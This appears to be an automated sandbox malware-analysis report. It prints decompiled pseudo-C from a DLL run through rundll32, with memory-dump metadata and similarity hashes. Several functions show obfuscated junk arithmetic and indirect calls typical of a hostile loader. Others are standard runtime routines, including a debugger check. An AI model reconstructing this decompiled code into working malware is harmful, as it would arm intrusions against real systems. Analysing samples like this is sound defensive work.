                				signed int _t568;
                				void* _t572;
                				void* _t580;
                				void* _t583;
                				void* _t587;
                				void* _t588;
                				signed int _t589;
                
                				_a8 = _t485;
                				GetProcessHeap();
                				r8d = 0x6a0;
                				_t298 = HeapAlloc(??, ??, ??);
                				r8d = 0x6a0;
                				 *0x5367c000 = _t429;
                				E00007FFA7FFA535E3F50(_t298, _t359, 0, _t410, _t418, _t429, _t563, _t568);
                				_t589 =  *0x5367c000; // 0x0
                				r8d = 0x2114;
                				r15d = 0x12ad;
                				 *(_t589 + 0x160) = _t589;
                				 *(_t589 + 0x70) = 0x1487;
                				_t4 = _t563 - 0x19; // 0x1294
                				r13d = _t4;
                				 *(_t589 + 0x20) = _t589;
                				_t6 = _t563 - 8; // 0x12a5
                				r12d = _t6;
                				 *(_t589 + 0x110) = _t589;
                				 *(_t589 + 0x240) = _t589;
                				 *(_t589 + 0x2a8) = _t568;
                				 *((long long*)(_t589 + 0x1b0)) = _t564;
                				 *(_t589 + 0x358) = _t589;
                				 *(_t589 + 0x148) = 0x1355;
                				 *(_t589 + 0x2a0) = _t589;
                				 *(_t589 + 0x5e8) = _t589;
                				 *((long long*)(_t589 + 0x68)) = _t563;
                				 *((long long*)(_t589 + 0x340)) = 0x11f1;
                				 *(_t589 + 0x108) = _t589;
                				 *((intOrPtr*)(_t589 + 0x630)) = 1;
                				_v68 = 0x1ad7;
                				_a24 = 0xc92;
                				_a16 = 0;
                				_v80 = 0;
                				_a32 = 0;
                				_v88 = r15d;
                				_v64 = r8d;
                				_v72 = 0x1ba7;
                				_v76 = 0x1582;
                				_v84 = 0x16ce;
                				if (_v84 == _a24 + 0x7f5) goto 0x535e1a2a;
                				if (_a32 - _a16 + 0x1ec0 >= 0) goto 0x535e19a8;
                				 *((long long*)( *(_t589 + 0x240) + 0x198)) =  *((intOrPtr*)( *(_t589 + 0x160) + 0x2c8));
                				 *((long long*)( *(_t589 + 0x160) + 0x2c8)) =  *((long long*)( *(_t589 + 0x160) + 0x2c8)) - 1;
                				 *( *(_t589 + 0x20) + 0x140) =  *( *(_t589 + 0x20) + 0x140) +  *((intOrPtr*)( *(_t589 + 0x5e8) + 0x90)) - _t563;
                				 *((long long*)(_t589 + 0x30)) = 0x5367c038;
                				 *((intOrPtr*)(_t589 + 0x60)) =  *((intOrPtr*)( *(_t589 + 0x5e8) + 0x2a8)) - 0x20e4;
                				 *( *(_t589 + 0x110) + 0x490) =  *( *(_t589 + 0x110) + 0x490) |  *( *(_t589 + 0x108) + 0x1a8);
                				 *( *(_t589 + 0x108) + 0x1a8) =  *( *(_t589 + 0x108) + 0x1a8) - 1;
                				 *((long long*)(_t589 + 0x150)) = 0x5367c008;
                				 *( *(_t589 + 0x358) + 0x10) =  *( *(_t589 + 0x358) + 0x10) * ( *((intOrPtr*)( *(_t589 + 0x110) + 0x250)) - _t568);
                				 *( *(_t589 + 0x20) + 0x188) =  *( *(_t589 + 0x20) + 0x188) |  *( *(_t589 + 0x358) + 0xa0) * 0x0000181f;
                				r8d = _v80;
                				r11d = _v76;
                				r8d = r8d + r13d;
                				r10d = _v88;
                				r9d = _v64;
                				r9d = r9d - 0xc8d;
                				 *((long long*)(_t589 + 0x428)) =  *((intOrPtr*)(_t589 + 0x30));
                				r10d = r10d - 0x61b;
                				_v120 = _v72 - 0xd0;
                				_v128 = _t589;
                				_v136 = _a24 + 0x61b;
                				_v144 = r9d;
                				r9d = _t583 + 0x93e;
                				_v152 = r10d;
                				_t306 = E00007FFA7FFA535F6898(_v64, _t485 - 0x5cd,  *((intOrPtr*)(_t589 + 0x30)),  *( *(_t589 + 0x358) + 0xa0) * 0x181f,  *(_t589 + 0x20), _t568, _t572);
                				r8d = 0x1fda;
                				_a24 = _t306;
                				 *((intOrPtr*)( *(_t589 + 0x5e8) + 0xb0)) =  *((intOrPtr*)( *(_t589 + 0x5e8) + 0xb0)) - ( *( *(_t589 + 0x20) + 0x320) ^ 0x00000bbb);
                				 *((long long*)(_t589 + 0x1b8)) =  *((intOrPtr*)(_t589 + 0x668));
                				 *((intOrPtr*)( *(_t589 + 0x108) + 0xc0)) =  *((intOrPtr*)( *(_t589 + 0x108) + 0xc0)) + _t587;
                				E00007FFA7FFA535FAF30(0x1ba7, _t485,  *( *(_t589 + 0x20) + 0x320) ^ 0x00000bbb, _t564, _t566, _t589);
                				r8d = _a32;
                				r8d = r8d + 0x1c76;
                				r11d = _v84;
                				r10d = _a24;
                				r11d = r11d + 0xa46;
                				r9d = _v72;
                				r10d = r10d - 0x3d9;
                				r9d = r9d - 0xaf9;
                				_v120 = _a24 + 0xb53;
                				_v128 = r9d;
                				_v136 = r10d;
                				_v144 = r11d;
                				_v152 = _v76 - 0x262;
                				_v88 = E00007FFA7FFA535F6E94(_v76 - 0x262, _a16 + 0x1582, _v72 - 0x62d, _t485,  *( *(_t589 + 0x358) + 0xa0) * 0x181f,  *( *(_t589 + 0x20) + 0x320) ^ 0x00000bbb, _t568, _t589, _t580);
                				 *( *(_t589 + 0x468)) =  *( *(_t589 + 0x160) + 0x1b0) ^ 0x7472768c;
                				 *((long long*)( *(_t589 + 0x160) + 0x360)) =  *((intOrPtr*)( *(_t589 + 0x2a0) + 0x3a0)) - _t588;
                				 *( *(_t589 + 0x5e8) + 0x418) =  *( *(_t589 + 0x160) + 0x230) | 0x00001515;
                				( *(_t589 + 0x468))[1] =  *((intOrPtr*)( *(_t589 + 0x240) + 0x70)) + 0x506c4cee;
                				 *((intOrPtr*)( *(_t589 + 0x20) + 0x238)) =  *((intOrPtr*)( *(_t589 + 0x20) + 0x238)) -  *((intOrPtr*)(_t589 + 0x130));
                				 *((long long*)(_t589 + 0x130)) =  *((long long*)(_t589 + 0x130)) - 1;
                				( *(_t589 + 0x468))[2] =  *(_t589 + 0x148) + 0x65745c1d;
                				 *( *(_t589 + 0x2a0) + 0x1c8) =  *( *(_t589 + 0x2a0) + 0xa0) * 0x12ad;
                				 *( *(_t589 + 0x160) + 0x5d0) =  *( *(_t589 + 0x160) + 0x5d0) *  *( *(_t589 + 0x2a0) + 0x28);
                				r11d = _v84;
                				r10d = _a24;
                				r11d = r11d - 0xb13;
                				r9d = _a16;
                				r10d = r10d + 0xa39;
                				r9d = r9d + r15d;
                				r8d = _v76;
                				 *( *(_t589 + 0x2a0) + 0x28) =  *( *(_t589 + 0x2a0) + 0x28) - 1;
                				r8d = r8d + 0x14c;
                				_v104 = _v68;
                				_v112 = r8d;
                				_v120 = r9d;
                				_v128 = r10d;
                				_v136 = r11d;
                				_v144 = _v84 - 0x1b9;
                				_t161 = _t564 - 0x7f5; // 0x49d
                				r9d = _t161;
                				_v152 = _v84 - 0x1b9;
                				_v88 = E00007FFA7FFA535F84F0(_v76 - 0x391, _v64, _v84 - 0x1b9, _a24, _t418, _t485, _t564, _t589, _t589);
                				( *(_t589 + 0x468))[2] =  *((intOrPtr*)( *(_t589 + 0x110) + 0x68)) + 0x6c56e2;
                				 *((intOrPtr*)( *(_t589 + 0x240) + 0x4b8)) =  *((intOrPtr*)( *(_t589 + 0x240) + 0x4b8)) + ( *( *(_t589 + 0x20) + 0x140) ^ 0x00001355);
                				_t463 =  *(_t589 + 0x240);
                				 *( *(_t589 + 0x20) + 0x5d8) =  *( *(_t589 + 0x20) + 0x5d8) ^  *((intOrPtr*)(_t463 + 0x1b0)) + 0x0000145c;
                				 *((intOrPtr*)(_t589 + 0x3e8))();
                				 *((long long*)(_t589 + 0x498)) = _t463;
                				goto 0x535e1a2a;
                				 *(_t589 + 0x330) =  *(_t589 + 0x330) ^ _a16 + 0x00001b47;
                				_v152 = _v80 *  *(_t589 + 0x2a0);
                				CloseHandle(??);
                				 *(_t589 + 0x240) =  *(_t589 + 0x240) + ( *(_t589 + 0xb0) & _v84 |  *(_t589 + 0x70));
                				if (_v72 - _v76 + 0x5c5 <= 0) goto 0x535e1aae;
                				r8d = _v84;
                				r8d = r8d - 0x1b9;
                				r11d = _v68;
                				r10d = _a16;
                				r11d = r11d - 0x55d;
                				r10d = r10d + 0x11f1;
                				_v120 = _v88 + 0x272;
                				_v128 = r10d;
                				_v136 = r11d;
                				_v144 = _a32 + 0x16ce;
                				_v152 = _v68 - 0x82a;
                				_v84 = E00007FFA7FFA535F8F2C(_a32 + r12d, _t485,  *(_t589 + 0x20), _t564, _t566, _v72 + _v80, _t589);
                				_v76 = _v76 + 0xfffffff8;
                				goto 0x535e1cee;
                				if ( *(_t589 + 0x108) -  *(_t589 + 0x108) -  *((intOrPtr*)(_t589 + 0x310)) < 0) goto 0x535e1c64;
                				_t470 = _v68;
                				if (_t470 - (_a32 &  *((intOrPtr*)(_t589 + 0x68)) - 0x00001b47) < 0) goto 0x535e1c13;
                				_a32 = _v80 ^ _a32 ^ _v84 + _v88;
                				 *(_t589 + 0xd8) =  *(_t589 + 0xd8) ^ (_t470 + ( *((intOrPtr*)(_t589 + 0x298)) -  *((intOrPtr*)(_t589 + 0x198)) &  *(_t589 + 0x3a0)) | _v84 *  *(_t589 + 0x3c8) + 0x0000145c) * _v76;
                				 *((intOrPtr*)(_t589 + 0x168)) =  *((intOrPtr*)(_t589 + 0x168)) - (_a16 +  *((intOrPtr*)(_t589 + 0x1b0))) * 0x157a;
                				r8d =  *(_t589 + 0x140);
                				r8d = r8d - 0x145c;
                				LeaveCriticalSection(??);
                				r15d = r15d - _a16;
                				 *(_t589 + 0x88) =  *(_t589 + 0x88) * (_v72 + r15d);
                				goto 0x535e1c64;
                				r8d = _v72;
                				r8d = r8d + _a16;
                				r9d = _v88;
                				r9d = r9d | _v64 & r12d;
                				r10d =  *(_t589 + 0x88);
                				r10d = r10d | _v80;
                				_v152 = r10d;
                				DisconnectNamedPipe(??);
                				if (_v68 != ( *(_t589 + 0x108) ^  *(_t589 + 0x2a8))) goto 0x535e1cee;
                				if (_v68 == _v68 + (_v80 |  *(_t589 + 0x140))) goto 0x535e1cd5;
                				r9d = r9d + 3;
                				 *(_t589 + 0xd8) =  *(_t589 + 0xd8) *  *(_t589 + 0x148) *  *(_t589 + 0x3b8);
                				if (r9d != _v68 + (_v80 |  *(_t589 + 0x140))) goto 0x535e1c96;
                				r8d = r8d + 1;
                				if (r8d == ( *(_t589 + 0x108) ^  *(_t589 + 0x2a8))) goto 0x535e1c7b;
                				ExitProcess(??);
                			}


                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: HeapProcess$AllocCloseCriticalExitHandleLeaveSection
                • String ID:
                • API String ID: 126649667-0
                • Opcode ID: 4b38d50d65ddf06cecd7d8751ab8fe2c6599f940d285598a8d05519128601b9e
                • Instruction ID: d47ff28244b39d2eb5a565c67a9f8f57efc8ec61dd40c4b8f80ae60d5faafcb5
                • Opcode Fuzzy Hash: 4b38d50d65ddf06cecd7d8751ab8fe2c6599f940d285598a8d05519128601b9e
                • Instruction Fuzzy Hash: 1F3206B2A10A908AEB54CF69E898BAD37B9F78878CF054526DF4D97B54CF38D550CB00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00007FFA7FFA535E59AC(void* __ecx, intOrPtr* __rax, void* __rcx, void* __rdx) {
                				void* _t1;
                
                				if (__rcx != 0) goto 0x535e59dd;
                				_t1 = E00007FFA7FFA535E8380(__rax);
                				 *__rax = 0x16;
                				E00007FFA7FFA535E8260(_t1);
                				return 0x16;
                			}





                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _get_daylight$_isindst$_invalid_parameter_noinfo
                • String ID:
                • API String ID: 1405656091-0
                • Opcode ID: 51c102ac9c2419231c36bf96dfe509cc6b16db95cb78000b505dd5ce6fe17035
                • Instruction ID: 6a254501618ceb464c2463a5cf7c6ddc1d39466bc1bcfdd50d903b4257d67876
                • Opcode Fuzzy Hash: 51c102ac9c2419231c36bf96dfe509cc6b16db95cb78000b505dd5ce6fe17035
                • Instruction Fuzzy Hash: 6A81D8B2B14B464FEB589F34C9513B923AAEF85788F08E475DA0D9A785EF3CE4009700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 65%
                			E00007FFA7FFA535E8054(void* __ecx, intOrPtr __edx, void* __esp, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r8) {
                				void* __rdi;
                				void* _t36;
                				void* _t37;
                				void* _t38;
                				int _t40;
                				void* _t43;
                				void* _t44;
                				intOrPtr _t52;
                				signed long long _t62;
                				long long _t65;
                				_Unknown_base(*)()* _t86;
                				void* _t90;
                				void* _t91;
                				void* _t93;
                				signed long long _t94;
                				struct _EXCEPTION_POINTERS* _t100;
                
                				_t45 = __ecx;
                				 *((long long*)(_t93 + 0x10)) = __rbx;
                				 *((long long*)(_t93 + 0x18)) = __rsi;
                				_t3 = _t93 - 0x4f0; // -1288
                				_t91 = _t3;
                				_t94 = _t93 - 0x5f0;
                				_t62 =  *0x53754140; // 0x9bd95a2971b4
                				 *(_t91 + 0x4e0) = _t62 ^ _t94;
                				_t52 = r8d;
                				_t44 = __ecx;
                				if (__ecx == 0xffffffff) goto 0x535e8093;
                				_t37 = E00007FFA7FFA535E3724(_t36);
                				_t5 = _t94 + 0x70; // 0x58
                				r8d = 0x98;
                				_t38 = E00007FFA7FFA535E3F50(_t37, __ecx, 0, _t52, __esp, _t5, _t86, __r8);
                				_t6 = _t91 + 0x10; // -1272
                				r8d = 0x4d0;
                				E00007FFA7FFA535E3F50(_t38, _t45, 0, _t52, __esp, _t6, _t86, __r8);
                				_t7 = _t94 + 0x70; // 0x58
                				 *((long long*)(_t94 + 0x48)) = _t7;
                				_t10 = _t91 + 0x10; // -1272
                				_t65 = _t10;
                				 *((long long*)(_t94 + 0x50)) = _t65;
                				__imp__RtlCaptureContext();
                				r8d = 0;
                				__imp__RtlLookupFunctionEntry();
                				if (_t65 == 0) goto 0x535e8126;
                				 *(_t94 + 0x38) =  *(_t94 + 0x38) & 0x00000000;
                				_t16 = _t94 + 0x60; // 0x48
                				 *((long long*)(_t94 + 0x30)) = _t16;
                				_t19 = _t94 + 0x58; // 0x40
                				 *((long long*)(_t94 + 0x28)) = _t19;
                				_t21 = _t91 + 0x10; // -1272
                				 *((long long*)(_t94 + 0x20)) = _t21;
                				__imp__RtlVirtualUnwind();
                				 *((long long*)(_t91 + 0x108)) =  *((intOrPtr*)(_t91 + 0x508));
                				_t25 = _t91 + 0x508; // 0x0
                				 *((intOrPtr*)(_t94 + 0x70)) = __edx;
                				 *((long long*)(_t91 + 0xa8)) = _t25 + 8;
                				 *((long long*)(_t91 - 0x80)) =  *((intOrPtr*)(_t91 + 0x508));
                				 *((intOrPtr*)(_t94 + 0x74)) = _t52;
                				_t40 = IsDebuggerPresent();
                				SetUnhandledExceptionFilter(_t86, _t90);
                				if (UnhandledExceptionFilter(_t100) != 0) goto 0x535e8188;
                				if (_t40 != 0) goto 0x535e8188;
                				if (_t44 == 0xffffffff) goto 0x535e8188;
                				_t43 = E00007FFA7FFA535E3724(_t42);
                				E00007FFA7FFA535F51E0();
                				return _t43;
                			}

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                • String ID:
                • API String ID: 1239891234-0
                • Opcode ID: 6ab7a5c12a0407af041816abddc0eba39aeae19ebafb7fd608393c2a948a6a94
                • Instruction ID: f429eeaa50d87a529be4717e38f090dfb5aaf64696a15ceccdf1ef425ecd3830
                • Opcode Fuzzy Hash: 6ab7a5c12a0407af041816abddc0eba39aeae19ebafb7fd608393c2a948a6a94
                • Instruction Fuzzy Hash: D731B436628F818ADB20CF25E8402AE73A9FBC5794F485135EA8D53B98DF3CD145CB00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 62%
                			E00007FFA7FFA535EDE00(void* __edx, void* __edi, intOrPtr* __rax, long long __rbx, intOrPtr* __rcx, long long __rdx, long long _a8, void* _a16, long long _a24, intOrPtr _a26, long long _a32) {
                				long long _v72;
                				intOrPtr _v80;
                				void* _v88;
                				long long _v96;
                				long long _v104;
                				void* __rdi;
                				void* __rsi;
                				void* __rbp;
                				void* _t33;
                				void* _t36;
                				void* _t37;
                				void* _t45;
                				intOrPtr* _t68;
                				signed long long _t70;
                				long long _t72;
                				long long _t74;
                				intOrPtr* _t78;
                				long long _t80;
                				void* _t85;
                				intOrPtr* _t87;
                				void* _t92;
                				long long* _t100;
                				long long _t106;
                				long long _t110;
                				void* _t112;
                				intOrPtr* _t114;
                				void* _t116;
                				void* _t119;
                				intOrPtr _t131;
                				void* _t133;
                				void* _t134;
                				signed long long _t135;
                				signed long long _t136;
                				signed long long _t139;
                				intOrPtr* _t140;
                
                				_t100 = __rdx;
                				_t87 = __rcx;
                				_t68 = __rax;
                				_a8 = __rbx;
                				_a16 = __rdx;
                				_t78 = __rcx;
                				if (__rdx != 0) goto 0x535ede3c;
                				_t33 = E00007FFA7FFA535E8380(__rax);
                				_t3 = _t110 + 0x16; // 0x16
                				 *__rax = _t3;
                				E00007FFA7FFA535E8260(_t33);
                				goto 0x535edfdc;
                				asm("xorps xmm0, xmm0");
                				 *_t100 = _t110;
                				asm("movdqu [ebp-0x20], xmm0");
                				_v72 = _t110;
                				if ( *_t87 == _t110) goto 0x535edea7;
                				_a24 = 0x3f2a;
                				_a26 = dil;
                				_t36 = E00007FFA7FFA535F2864(_t45, __edx,  *_t78,  &_a24);
                				if (_t68 != 0) goto 0x535ede7e;
                				r8d = 0;
                				_t37 = E00007FFA7FFA535EE00C(_t36, _t78,  *_t78,  &_a24, _t110, _t112, _t116, _t119,  &_v88);
                				goto 0x535ede8a;
                				0x535ee11c();
                				r14d = _t37;
                				if (_t37 != 0) goto 0x535ede9a;
                				goto 0x535ede4e;
                				goto 0x535edfa0;
                				_t114 = _v88;
                				_t131 = _v80;
                				_a24 = _t110;
                				_t70 = _t131 - _t114;
                				_t139 = (_t70 >> 3) + 1;
                				_t92 =  >  ? _t110 : _t70 + 7 >> 3;
                				_t136 = _t135 | 0xffffffff;
                				if (_t92 == 0) goto 0x535edf09;
                				_t72 = _t136 + 1;
                				if ( *((intOrPtr*)( *_t114 + _t72)) != dil) goto 0x535edeea;
                				if (_t110 + 1 != _t92) goto 0x535edee4;
                				_a24 = _t110 + 1 + _t72;
                				r8d = 1;
                				E00007FFA7FFA535E72EC(_t37, _t139, _t110 + 1 + _t72, _t110 + 1);
                				_t80 = _t72;
                				if (_t72 == 0) goto 0x535edf99;
                				_t106 = _t72 + _t139 * 8;
                				_t140 = _t114;
                				_v96 = _t106;
                				_a32 = _t106;
                				if (_t114 == _t131) goto 0x535edf8f;
                				_v104 = _t80 - _t114;
                				_t133 = _t136 + 1;
                				if ( *((intOrPtr*)( *_t140 + _t133)) != dil) goto 0x535edf49;
                				_t134 = _t133 + 1;
                				if (E00007FFA7FFA535F1998(_t80, _t106, _t106 - _t106 + _a24, _t134) != 0) goto 0x535edff4;
                				_t74 = _a32;
                				 *((long long*)(_v104 + _t140)) = _t74;
                				_a32 = _t74 + _t134;
                				if (_t140 + 8 != _t131) goto 0x535edf43;
                				r14d = 0;
                				 *_a16 = _t80;
                				E00007FFA7FFA535E7E58(_a16, _v104);
                				_t85 =  >  ? _t110 : _t131 - _t114 + 7 >> 3;
                				if (_t85 == 0) goto 0x535edfd1;
                				E00007FFA7FFA535E7E58(_a16,  *_t114);
                				if (_t110 + 1 != _t85) goto 0x535edfbd;
                				E00007FFA7FFA535E7E58(_a16, _t114);
                				return r14d;
                			}

                APIs
                • _invalid_parameter_noinfo.LIBCMT ref: 00007FFA535EDE30
                  • Part of subcall function 00007FFA535E8280: IsProcessorFeaturePresent.KERNEL32(00007FFA535EF385), ref: 00007FFA535E8289
                  • Part of subcall function 00007FFA535E8280: GetCurrentProcess.KERNEL32(00007FFA535EF385), ref: 00007FFA535E82AD
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                • String ID: *?$.
                • API String ID: 4036615347-3972193922
                • Opcode ID: 6d596129e1decb9b41ca20d2be82681836e38efb530b16a80fb35605405d6583
                • Instruction ID: bdd56421e6d2085a6da203f47ace1649a748ade4d58a299038f3c52643143aa3
                • Opcode Fuzzy Hash: 6d596129e1decb9b41ca20d2be82681836e38efb530b16a80fb35605405d6583
                • Instruction Fuzzy Hash: 8A51D462B24F958DEB10DFA298104BC67AAEF99BD4B489171EE1D27B85EE3CD4419300
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00007FFA7FFA535EE00C(void* __eax, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32) {
                				signed long long _t16;
                				signed long long _t17;
                				void* _t25;
                				signed long long _t34;
                
                				_t16 = _t34;
                				 *((long long*)(_t16 + 8)) = __rbx;
                				 *((long long*)(_t16 + 0x10)) = __rbp;
                				 *((long long*)(_t16 + 0x18)) = __rsi;
                				 *((long long*)(_t16 + 0x20)) = __rdi;
                				_t17 = _t16 | 0xffffffff;
                				_t25 = _t17 + 1;
                				if ( *((char*)(__rcx + _t25)) != 0) goto 0x535ee03c;
                				if (_t25 + __rdx - _t17 - __r8 <= 0) goto 0x535ee077;
                				return __rdx + 0xb;
                			}








                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID:
                • String ID: .
                • API String ID: 0-248832578
                • Opcode ID: 98f0a0a0ffbd8457f511dbff3d5ba58b21ea4657e0e46df95334be7b8c4eb98f
                • Instruction ID: fb856f5e73ae919ce4d53792a4feedd2fe93005318ce6fe3635bb32224fb5c0e
                • Opcode Fuzzy Hash: 98f0a0a0ffbd8457f511dbff3d5ba58b21ea4657e0e46df95334be7b8c4eb98f
                • Instruction Fuzzy Hash: 9831EA22B24F9149F7609B3298057A9AA96AFC6BE4F0CD235DE6C17BC5DE3CD5018300
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 52%
                			E00007FFA7FFA535F6E94(void* __ebx, void* __ecx, void* __edx, long long __rbx, void* __rcx, void* __rdx, signed int __r8, long long __r9, void* __r10) {
                				void* __rdi;
                				void* __rsi;
                				void* __rbp;
                				intOrPtr _t362;
                				signed int _t367;
                				long _t371;
                				intOrPtr _t406;
                				signed int _t410;
                				signed int _t453;
                				intOrPtr _t455;
                				signed int _t461;
                				signed int _t462;
                				signed int _t464;
                				void* _t476;
                				long long _t494;
                				signed long long _t545;
                				signed long long _t558;
                				long long _t585;
                				long long _t616;
                				signed long long _t645;
                				signed long long _t662;
                				signed int _t672;
                				void* _t677;
                				void* _t680;
                				void* _t682;
                				void* _t684;
                				void* _t685;
                				signed int _t687;
                				signed long long _t688;
                				signed long long _t690;
                				void* _t695;
                				signed long long _t696;
                				void* _t697;
                				long long _t700;
                				void* _t702;
                				void* _t705;
                				signed long long _t707;
                				void* _t709;
                
                				_t695 = __r10;
                				_t687 = __r8;
                				 *((long long*)(_t684 + 0x20)) = __rbx;
                				_t685 = _t684 - 0xa0;
                				r10d =  *(_t685 + 0x120);
                				_t406 =  *((intOrPtr*)(_t685 + 0x108));
                				 *(_t685 + 0xe0) = __rdx + 0x946;
                				r9d =  *(_t685 + 0x110);
                				r12d = __r10 - 0x1fda;
                				r9d = r9d + 0x771;
                				 *(_t685 + 0xe8) = __rcx - 0x8f0;
                				r14d = __rbx - 0xb9a;
                				r15d = _t476 - 0x4f3;
                				 *(_t685 + 0x80) = r9d;
                				_t462 = _t476 + 0x1ff;
                				 *((intOrPtr*)(_t685 + 0x94)) = r12d;
                				 *(_t685 + 0x8c) = _t462;
                				r10d = r10d + 0xfffff845;
                				 *((intOrPtr*)(_t685 + 0x88)) = __r8 - 0x1c76;
                				 *(_t685 + 0x90) = r15d;
                				_t362 = __r8 - 0x6fc;
                				 *((intOrPtr*)(_t685 + 0x98)) = _t362;
                				r11d = __rdx + 0x3ae;
                				 *(_t685 + 0xf0) = r11d;
                				_t453 = __rdx + 0xcba;
                				 *(_t685 + 0x118) = r10d;
                				r9d = __rcx - 8;
                				 *(_t685 + 0x120) = _t453;
                				 *(_t685 + 0x100) = r9d;
                				r8d = 0x10ae;
                				if (r15d - _t406 > 0) goto 0x535f7553;
                				if (_t462 - _t362 + 0xfffffda6 > 0) goto 0x535f7049;
                				 *((long long*)(__r9 + 0x410)) =  *(__r9 + 0x240) + 0x128;
                				 *((intOrPtr*)(__r9 + 0x348)) = 0x116000;
                				 *((long long*)(__r9 + 0xf0)) = 0x80000000;
                				r14d = r14d - 0x11e;
                				 *((intOrPtr*)(_t685 + 0x108)) = _t406 + 0xfffff373;
                				 *((long long*)( *(__r9 + 0x2a0) + 0x420)) =  *((intOrPtr*)(__r9 + 0x5e8)) + 0x58;
                				 *( *((intOrPtr*)(__r9 + 0x358)) + 0x1a8) =  *( *((intOrPtr*)(__r9 + 0x358)) + 0x1a8) * ( *((intOrPtr*)( *(__r9 + 0x110) + 0x68)) - 0x11f1);
                				 *((short*)(__r9 + 0x100)) = ( *( *((intOrPtr*)(__r9 + 0x358)) + 0x1b0) & 0x0000ffff) - 0x1fd3;
                				_t585 = __r9 + 0x1d8;
                				 *((intOrPtr*)(__r9 + 0x380)) = 0x400;
                				 *(_t685 + 0x84) = __rdx - 0x1320 + 0x12ad;
                				 *((intOrPtr*)( *(__r9 + 0x2a0) + 0xc0)) =  *((intOrPtr*)( *(__r9 + 0x2a0) + 0xc0)) - ( *( *(__r9 + 0x2a0) + 0x5d0) ^ 0x0000181f);
                				 *( *((intOrPtr*)(__r9 + 0x5e8)) + 0x130) =  *( *((intOrPtr*)(__r9 + 0x5e8)) + 0x130) *  *( *((intOrPtr*)(__r9 + 0x358)) + 0x128);
                				 *( *((intOrPtr*)(__r9 + 0x358)) + 0x128) =  *( *((intOrPtr*)(__r9 + 0x358)) + 0x128) + 1;
                				 *((long long*)(__r9 + 0x2b0)) = E00007FFA7FFA535FB25C;
                				 *((long long*)(__r9 + 0x2b8)) = E00007FFA7FFA535FB5B0;
